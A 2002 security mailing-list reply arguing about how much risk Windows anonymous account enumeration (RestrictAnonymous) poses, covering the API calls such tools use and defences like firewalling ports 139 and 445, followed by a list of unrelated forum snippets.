Re: Cmon In: RestrictAnonymous=0

From: jussi jaakonaho (jussi@nospam.mataaratanga.com)
Date: 12/25/02 

From: "jussi jaakonaho" <jussi@nospam.mataaratanga.com>
Date: Wed, 25 Dec 2002 12:35:37 +0200

> Why doesn't Microsoft block this hole by default, and
> then advise admins about the cases where it might make
> sense to manually reopen it?
-hmmm,
those hacker tools, when ra=1, use lookupaccountsid-api call to get the
account names and the renamed account (and lookupaccountname-api for getting
the sid part for the machine first , and the the lookupaccountsid after
adding rid after the sid). those tools allow you to get account names and
renamed admin. is that already a breakin of the computer itself? access to
contents of it? huge hole which gives you remote root?

is it a risk when someone gets that information? then it comes to strength
of the passwords, ability to log on remotely, strong policy on the target
etc etc and auditing which gives information - yeah, not ip yet - when
someone uses the information gathered via those calls by logging in 1200
times/second. (accounts are specified to be locked out by policy? even
admin? if they are locked out can the attacker still get in?). yeah, in some
cases it could be a risk, and then it might be need to be secured.

< secure Windows from abuse via the Internet.
-you need 139 (and 445 on w2k) open to be able to do it from the internet
(or any other port when used another host as a jump station etc) . so first
layer against direct attack from the internet would be firewalls (or
routers) blocking those ports against abuse.

<single most important thing you can do to secure
-is restricting account information the most important thing when the same
information could be available via other methods? lanman mibs give you user
information (yep, needs snmp, but if 139,445 are open then there most likely
is snmp as well), different api calls can give same information via bruting.

_jussi

Relevant Pages

  • Re: AD design question....again
    ... What do you want to secure against? ... Just know that it is indeed quite easily possible for someone with control of any single DC In the forest to gain control over the entire forest. ... Any account with too many rights to the domain or DCs is a problem. ... - empty domain model would not "secure" the enterprise admin ...
    (microsoft.public.win2000.active_directory)
  • Re: [Off Topic] Re: Linux security
    ... member that isn't following the rules and infecting everyone else or there is a hole out there that he hasn't taken into account. ... If all it takes is one moment of inattention to render the computer useless, that tells me that the system is seriously broken. ... A secure system has sane defaults, fails gracefully, and is resilient to small errors. ...
    (Ubuntu)
  • Re: Do you give admin privileges to your day-to-day acct?
    ... 22 trying different passwords for user "admin" and I do use ssh, ... All you need to do to close that hole is secure your SSH daemon through /etc/sshd_conf. ...
    (comp.sys.mac.system)
  • Re: Do you give admin privileges to your day-to-day acct?
    ... 22 trying different passwords for user "admin" and I do use ssh, ... All you need to do to close that hole is secure your SSH daemon through /etc/sshd_conf. ...
    (comp.sys.mac.system)
  • Re: Incoming E-Mail - cant create contact in OU
    ... central admin pool different than the web app. ... that account a little (if the web app is compromised or something, ... So I started with giving the app pool account domain admins permissions then ...
    (microsoft.public.sharepoint.windowsservices)